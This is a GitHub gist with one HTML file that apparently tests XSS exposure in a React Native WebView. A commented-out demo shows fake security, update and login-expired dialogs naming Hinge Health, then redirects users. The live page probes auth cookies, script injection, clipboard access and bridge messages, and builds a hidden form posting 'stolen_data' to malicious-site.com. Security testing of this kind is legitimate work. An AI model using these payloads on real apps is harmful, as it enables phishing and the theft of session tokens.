Skip to content

Instantly share code, notes, and snippets.

@leovarmak

leovarmak/index.html

Last active September 18, 2025 08:16
Show Gist options
  • Save leovarmak/6c472bca326e34ea9c2f851a06105fe1 to your computer and use it in GitHub Desktop.
Save leovarmak/6c472bca326e34ea9c2f851a06105fe1 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
index.html
<!-- <!DOCTYPE html>
<html>
<head>
<title>XSS Redirect Attack Demo</title>
<style>
body { font-family: Arial, sans-serif; margin: 20px; background: #2c3e50; color: white; }
.result { padding: 10px; margin: 5px 0; border-radius: 5px; }
.success { background: #27ae60; }
.danger { background: #e74c3c; }
.warning { background: #f39c12; }
button { padding: 10px 15px; background: #e67e22; color: white; border: none; border-radius: 5px; margin: 5px; }
</style>
</head>
<body>
<h1>🚨 XSS Redirect Attack Demo</h1>
<p>This demonstrates how XSS attacks can trick users with fake alerts and redirect them to malicious sites.</p>
<div id="results"></div>
<button onclick="fakeSecurityAlert()">🚨 Fake Security Alert</button>
<button onclick="fakeAppUpdate()">📱 Fake App Update Alert</button>
<button onclick="fakeLoginExpired()">🔑 Fake Login Expired</button>
<button onclick="immediateRedirect()">🔗 Immediate Redirect</button>
<script>
function log(test, status, details) {
const div = document.createElement('div');
div.className = 'result ' + (status === 'SUCCESS' ? 'danger' : status === 'BLOCKED' ? 'success' : 'warning');
div.innerHTML = '<strong>' + test + ':</strong> ' + status + ' - ' + details;
document.getElementById('results').appendChild(div);
// Log to React Native
if (window.ReactNativeWebView) {
window.ReactNativeWebView.postMessage(JSON.stringify({
type: 'XSS_REDIRECT_LOG',
test: test,
status: status,
details: details
}));
}
}
function fakeSecurityAlert() {
log('Fake Alert', 'EXECUTING', '🚨 Showing fake security alert...');
const userClicked = confirm('🚨 SECURITY ALERT: Your account may be compromised! Your login session has been detected from an unusual location. Click OK to secure your account immediately or your data may be at risk!');
if (userClicked) {
log('Social Engineering', 'SUCCESS', '🎣 User clicked OK on fake security alert!');
log('Redirect Attack', 'EXECUTING', '🔗 Redirecting to haveibeenpwned.com...');
// Send notification to React Native before redirect
if (window.ReactNativeWebView) {
window.ReactNativeWebView.postMessage(JSON.stringify({
type: 'REDIRECT_ATTACK_SUCCESS',
message: 'User fell for fake security alert and will be redirected',
targetUrl: 'https://haveibeenpwned.com/',
attackType: 'fake_security_alert'
}));
}
// Redirect after short delay
setTimeout(() => {
window.location.href = 'https://haveibeenpwned.com/';
}, 1000);
} else {
log('Social Engineering', 'PARTIAL', '⚠️ User cancelled but still saw convincing fake alert');
}
}
function fakeAppUpdate() {
log('Fake Update', 'EXECUTING', '📱 Showing fake app update alert...');
const userClicked = confirm('📱 APP UPDATE REQUIRED: A critical security update is available for Hinge Health. Click OK to download the latest version to protect your health data.');
if (userClicked) {
log('App Update Scam', 'SUCCESS', '🎣 User clicked on fake app update!');
if (window.ReactNativeWebView) {
window.ReactNativeWebView.postMessage(JSON.stringify({
type: 'FAKE_UPDATE_SUCCESS',
message: 'User fell for fake app update scam'
}));
}
// Redirect to "update" site (actually haveibeenpwned.com)
setTimeout(() => {
window.location.href = 'https://haveibeenpwned.com/';
}, 1000);
} else {
log('App Update Scam', 'PARTIAL', '⚠️ User dismissed fake update alert');
}
}
function fakeLoginExpired() {
log('Login Scam', 'EXECUTING', '🔑 Showing fake login expired alert...');
const userClicked = confirm('🔑 SESSION EXPIRED: Your Hinge Health session has expired for security reasons. Click OK to re-authenticate and continue using the app.');
if (userClicked) {
log('Login Redirect', 'SUCCESS', '🎣 User clicked on fake login expired alert!');
if (window.ReactNativeWebView) {
window.ReactNativeWebView.postMessage(JSON.stringify({
type: 'FAKE_LOGIN_SUCCESS',
message: 'User will be redirected to fake login page'
}));
}
// Redirect to "login" page (haveibeenpwned for demo)
setTimeout(() => {
window.location.href = 'https://haveibeenpwned.com/';
}, 1000);
} else {
log('Login Redirect', 'PARTIAL', '⚠️ User dismissed but saw convincing login scam');
}
}
function immediateRedirect() {
log('Immediate Redirect', 'EXECUTING', '🔗 Attempting immediate redirect without user interaction...');
try {
// Try silent redirect
window.location.href = 'https://haveibeenpwned.com/';
log('Silent Redirect', 'SUCCESS', '🚨 CRITICAL: Silent redirect successful - user sent away without consent!');
} catch (e) {
log('Silent Redirect', 'BLOCKED', '🛡️ Silent redirect blocked: ' + e.message);
}
}
// Auto-execute the fake security alert after 2 seconds to simulate real attack
setTimeout(() => {
log('Auto Attack', 'STARTING', '⏰ Auto-executing fake security alert in 3 seconds...');
setTimeout(() => {
fakeSecurityAlert();
}, 3000);
}, 2000);
</script>
</body>
</html> -->
<!DOCTYPE html>
<html>
<head>
<title>XSS Security Test</title>
<style>
body { font-family: Arial, sans-serif; margin: 20px; }
.result { padding: 10px; margin: 5px 0; border-radius: 5px; }
.success { background: #d4edda; color: #155724; }
.danger { background: #f8d7da; color: #721c24; }
.warning { background: #fff3cd; color: #856404; }
</style>
</head>
<body>
<h1>🔍 Simple XSS & Security Test</h1>
<div id="results"></div>
<script>
function log(test, status, details) {
const div = document.createElement('div');
div.className = 'result ' + (status === 'VULNERABLE' ? 'danger' : status === 'PROTECTED' ? 'success' : 'warning');
div.innerHTML = '<strong>' + test + ':</strong> ' + status + ' - ' + details;
document.getElementById('results').appendChild(div);
}
// Test 1: Basic XSS - Document manipulation
try {
document.body.innerHTML += '<img src="x" onerror="alert(\'XSS Alert Test\')">';
log('XSS Alert', 'VULNERABLE', '🚨 XSS alert() function works - could show fake dialogs');
} catch (e) {
log('XSS Alert', 'PROTECTED', '🛡️ XSS alert blocked: ' + e.message);
}
// Test 2: Cookie theft (your main concern)
try {
const cookies = document.cookie;
if (cookies.includes('token') || cookies.includes('auth') || cookies.includes('jwt')) {
log('Cookie Theft', 'VULNERABLE', '🚨 CRITICAL: Found auth cookies: ' + cookies.substr(0, 100));
} else if (cookies.length > 0) {
log('Cookie Access', 'WARNING', 'Can read cookies: ' + cookies.substr(0, 50));
} else {
log('Cookie Access', 'PROTECTED', '🛡️ No cookies accessible');
}
} catch (e) {
log('Cookie Access', 'PROTECTED', '🛡️ Cookie access blocked');
}
// Test 3: Local storage access
try {
localStorage.setItem('xss_test', 'malicious_data');
const testData = localStorage.getItem('xss_test');
if (testData) {
log('Local Storage', 'VULNERABLE', '⚠️ Can write/read localStorage');
} else {
log('Local Storage', 'PROTECTED', '🛡️ localStorage write failed');
}
} catch (e) {
log('Local Storage', 'PROTECTED', '🛡️ localStorage blocked: ' + e.message);
}
// Test 4: React Native bridge access
if (window.ReactNativeWebView) {
try {
window.ReactNativeWebView.postMessage(JSON.stringify({
type: 'XSS_BRIDGE_TEST',
maliciousPayload: 'test_data',
attemptedAction: 'steal_user_token'
}));
log('Bridge XSS', 'WARNING', '⚠️ Can send messages to React Native app');
} catch (e) {
log('Bridge XSS', 'PROTECTED', '🛡️ Bridge messaging blocked');
}
} else {
log('Bridge Access', 'PROTECTED', '🛡️ No React Native bridge found');
}
// Test 5: URL manipulation
try {
const originalUrl = window.location.href;
window.history.pushState({}, '', '/malicious-redirect');
if (window.location.href !== originalUrl) {
log('URL Manipulation', 'VULNERABLE', '⚠️ Can manipulate browser URL');
} else {
log('URL Manipulation', 'PROTECTED', '🛡️ URL manipulation blocked');
}
} catch (e) {
log('URL Manipulation', 'PROTECTED', '🛡️ URL manipulation blocked: ' + e.message);
}
// Test 6: Script injection
try {
const script = document.createElement('script');
script.innerHTML = 'window.injectedMaliciousCode = true;';
document.head.appendChild(script);
if (window.injectedMaliciousCode) {
log('Script Injection', 'VULNERABLE', '🚨 Can inject and execute scripts');
} else {
log('Script Injection', 'PROTECTED', '🛡️ Script injection blocked');
}
} catch (e) {
log('Script Injection', 'PROTECTED', '🛡️ Script injection blocked: ' + e.message);
}
// Test 7: Form hijacking
try {
const form = document.createElement('form');
form.method = 'POST';
form.action = 'https://malicious-site.com/steal';
form.innerHTML = '<input type="hidden" name="stolen_data" value="user_session">';
document.body.appendChild(form);
log('Form Injection', 'WARNING', '⚠️ Can inject forms (potential phishing)');
} catch (e) {
log('Form Injection', 'PROTECTED', '🛡️ Form injection blocked: ' + e.message);
}
// Test 8: Clipboard access
if (navigator.clipboard) {
navigator.clipboard.writeText('MALICIOUS_CLIPBOARD_DATA').then(() => {
log('Clipboard Write', 'WARNING', '⚠️ Can write to clipboard');
}).catch(e => {
log('Clipboard Write', 'PROTECTED', '🛡️ Clipboard write blocked');
});
navigator.clipboard.readText().then(text => {
if (text) {
log('Clipboard Read', 'VULNERABLE', '🚨 Can read clipboard: ' + text.substr(0, 50));
}
}).catch(e => {
log('Clipboard Read', 'PROTECTED', '🛡️ Clipboard read blocked');
});
} else {
log('Clipboard API', 'PROTECTED', '🛡️ Clipboard API not available');
}
// Auto-run tests
setTimeout(() => {
log('Auto Test', 'INFO', '✅ XSS security tests completed automatically');
// Send results to React Native
if (window.ReactNativeWebView) {
window.ReactNativeWebView.postMessage(JSON.stringify({
type: 'XSS_TEST_COMPLETE',
message: 'Simple XSS security tests completed'
}));
}
}, 2000);
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment